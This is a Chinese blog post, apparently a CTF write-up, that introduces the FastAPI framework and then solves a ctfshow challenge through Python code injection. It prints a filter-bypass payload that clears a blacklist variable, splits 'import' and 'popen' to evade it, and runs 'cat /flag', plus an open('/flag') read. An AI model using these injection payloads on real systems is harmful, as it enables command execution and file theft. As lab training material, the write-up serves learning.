原谅5_fastapi2(fastapi)

最新推荐文章于 2023-12-13 17:47:13 发布
最新推荐文章于 2023-12-13 17:47:13 发布
阅读量909 收藏 1
点赞数
分类专栏: # 各平台题目
https://blog.csdn.net/qq_44657899
本文链接:https://blog.csdn.net/qq_44657899/article/details/112109915
版权

文章目录

了解fastapi

fastapi的官方文档:https://fastapi.tiangolo.com/zh/

根据官方文档所说,fastapi是一个web框架,感觉和flask差不多

在这里插入图片描述

然后下载fastapi试试:

pip install fastapi
pip install uvicorn

安装好之后把文档里的示例代码运行一下

main.py

在这里插入图片描述
运行:

uvicorn main:app --reload

在这里插入图片描述

在这里插入图片描述
看到了和文档差不多的结果,然后访问http://127.0.0.1:8000/,可以发现环境已经搭建好了
在这里插入图片描述

测试一下路由/items/{item_id},访问http://127.0.0.1:8000/items/5?q=somequery

@app.get("/items/{item_id}")
def read_item(item_id: int, q: str = None):
    return {"item_id": item_id, "q": q}

在这里插入图片描述

item_id: int, q: str = None的作用是定义数据类型为int和str,并且给q赋初值None,不传q果然为空
在这里插入图片描述
如果不赋初值的话则必须传q,否则会报错。

fastapi还有个交互式API,地址为/docs和/redoc,可以通过它来选择要调试的api,并传递参数给api实时查看结果,也就是说有了这个界面我们就知道参数有哪些,否则光一个api界面我们也不知道参数,因此这个功能只能用于调试。
在这里插入图片描述

题解

进入题目是一个fastapi,然后访问/docs或/redoc访问交互式界面
在这里插入图片描述

有三个路由,根据题目意思应该选择中间那个
在这里插入图片描述

通过这个界面我们知道它需要传递一个参数q进去
在这里插入图片描述

因为是基于python的,所以试试ssti,测试发现存在ssti
在这里插入图片描述

然后注入,怎么注入都不行,后面的操作就有点看不懂了,看了题解才知道有过滤,先查看当前的全局变量

list(calc.__globals__)

在这里插入图片描述

查看其中的 youdontknow

youdontknow

在这里插入图片描述

好家伙,过滤了class,然后要用clear()把这个变量清空

youdontknow.clear()

在这里插入图片描述

然后就是正常的ssti了

q=str([].__class__.__base__.__subclasses__()[189].__init__.__globals__['__builtins__']['__imp'+'ort__']("os").__dict__['pop'+'en']("cat /flag").read())

在这里插入图片描述

还可以通过open函数直接读取

open("/flag").read()

在这里插入图片描述

天问_Herbert555
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
ctfshow 原谅
qq_45655564的博客
09-09 671
原谅4 这是提示。 老前辈说过“最安全的系统就是什么都没有”,我把没用的命令都删了,看你还怎么执行 你知道系统环境变量里的PATH是干什么的吗? 查看phpinfo发现禁用了很多东西,根据提示,查看$PATH echo $PATH 然后到各路径下查看 然后查看/bin 发现只有三个命令,ls rm sh 所以这里我们可以执行shell脚本 echo -e "%23!/bin/sh\nwhile read LINE\ndo\necho \$LINE\ndone < /flag" > readfl
FastAPI(2)快速入门
ben_na_的博客
04-07 942
1、安装FastAPI 安装fastapi和unicorn模块,unicorn可以作为服务器 pip install fastapi -i https://pypi.tuna.tsinghua.edu.cn/simple pip install unicorn -i https://pypi.tuna.tsinghua.edu.cn/simple 2、启动一个最简单的例子 # filename: main.py from fastapi import FastAPI app = FastAPI()
[原谅杯]Web部分WP
Y4tacker的博客
11-23 1273
前言 看到群里又那么多小伙伴想要一份WP,那就写一下吧,其实在我的网站上也有,只是比较简陋,这里比较详细的写一份吧,希望大家一起加油!!! 开始写了预计今晚完成
CTFSHOW WEB练习
qq_51558360的博客
05-30 1179
web1 分析:需要满足id=1000,同时intval($id) > 999要返回false(intval是将变量取整(注:如果变量是小数,那么变量小数位不能为0,如果为0,会被认为是整数)) 方法一:使用’1000’字符串('1000’进行intval后还是1000) 方法二:125<<3(注8000>>3不行) 方法三:使用680|320 方法四:使用hex(16进制绕过) intval使用举例 <?php echo intval(42);
从性能、开发难度、推广使用等方面,对比一下django flask fastapi的优点和缺点
qq_39388986的博客
06-19 2194
从性能、开发难度、推广使用等方面,对比一下django flask fastapi的优点和缺点
ActionScript 3_En_all API
11-04
1、官方英文Html 版的 ActionScript 3 API(全) 2、此版本的完全相同的“中文版本”从以下地址下载: http://download.csdn.net/detail/jerry_008808/3724135 3、因小弟分数不够,请大家原谅
javaAPI_1.6英文版part1
09-01
最近打算了解下java,结果找不到一个完整的带搜索功能的javaAPI_1.6的英文chm版本,于是咱就从oracle官网下了doc自己做了一个,其中doc是上传前(2011-9-1)刚下载的最新版,chm带索引、搜索。本人第一次制作,如有出错...
fonoapi:FonoApi-移动设备描述API
01-28
由于服务器上的负载过重,API已关闭不便之处,敬请原谅,我们将尽快对其进行备份!谢谢。FonoApi-移动设备描述Api 数据库更新:2016年9月21日数据库已更新(已添加新设备):2016年11月27日数据库已更新(旧设备数据...
安卓sdk及API下载全
01-07
不要怪我要分高,博主下载实属不易,请原谅我吧。文档中有下载地址(好像此资源被封锁了,所以请打开文档中的链接,提取密码为:97w5)
simplePagination API 翻译
11-03
这个文档是我根据官网翻译的,有两个没有试出到底是什么功能,所以没有翻译。不要吐槽,不要吐槽。要原谅
FastAPI 教程翻译 - 介绍
人生苦短,我用Python!
05-30 2614
FastAPI 教程翻译 - 介绍 FastAPI framework, high performance, easy to learn, fast to code, ready for production FastAPI 框架,高性能,易于学习,快速编写代码,可投入生产 Documentation: https://fastapi.tiangolo.com 文档:https://fastapi.tiangolo.com Source Code: https://github.com/tiangolo
FastAPI 定义全局变量并实现通过接口改变全局变量
qq_38895920的博客
12-28 2385
FastAPI 定义全局变量并实现通过接口改变全局变量
fastapi变量名
chise_
03-30 364
一句话:千万不要在fastapi里面定义下划线为输入变量名,会被转化为横线-,导致错误。。。
Python 多进程中 分享全局变量
q742971636的博客
11-18 3056
在Python中,一种在多进程中,利用标签向进程分享全局变量,且开放Web接口的方法 import base64 import os import time import traceback import cv2 from multiprocessing import Manager, Process import uvicorn from fastapi.middleware.cors import CORSMiddleware from fastapi import FastAPI, File, Fo
python fastapi 说明(引用)
lyang0303的专栏
07-07 1250
https://www.cnblogs.com/sanduzxcvbnm/category/1633054.html
CTFshow_1024杯_Web——“1024_fastapi”、“1024_WEB签到”
Ho1aAs‘s Blog
11-01 2284
文章目录一、“1024_fastapi”二、“1024_WEB签到”完 一、“1024_fastapi” 打开环境,提示fastapi 对于fastapi,网页会存在自述文档文件/docs,打开发现一个接口 提示需要POST参数q执行操作 访问/cccalccc 由于fastapi基于Python,尝试POST一些简单的有返回值的Python函数 运行成功,POST参数q,可以尝试SSTI q=str([].__class__) >>{"res":"<class 'list'>"
ctfshow原谅
记录学习,一起进步
05-24 1335
cyfshow原谅
如何评价最近爆红的FastAPI
热门推荐
m0_57290404的博客
08-01 1万+
一度觉得sanic是pythonweb框架的未来,支持异步,性能好,类flask的语法,代码简单,没想到被fastapi截胡了,fastapi在github的上星速度非常快。它在怎么样把后端api做好的这件事情上,做的比sanic更全面,更彻底。是用于构建WebAPI的现代、开源、快速、高性能的Web框架,它基于Python3.6+标准类型提示,支持异步,正如它的名字,FastAPI就是为构建快速的API而生。...
Fastapi框架】Fastapi的使用和进阶
最新发布
黎明总是如期而至
12-13 2392
1.已有中间件HTTPSRedirectMiddleware是fasapi自带的中间件2.自定义中间件。
html用烟花特效显示“姐姐我错啦,原谅我好不好”
05-28
这段代码会在页面中央显示一个白色的文字“姐姐我错啦,原谅我好不好”,并且会随机创建白色的烟花特效。可以在样式中调整文字的颜色、大小、位置等属性,也可以在JavaScript中调整烟花的创建间隔、持续时间等参数。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值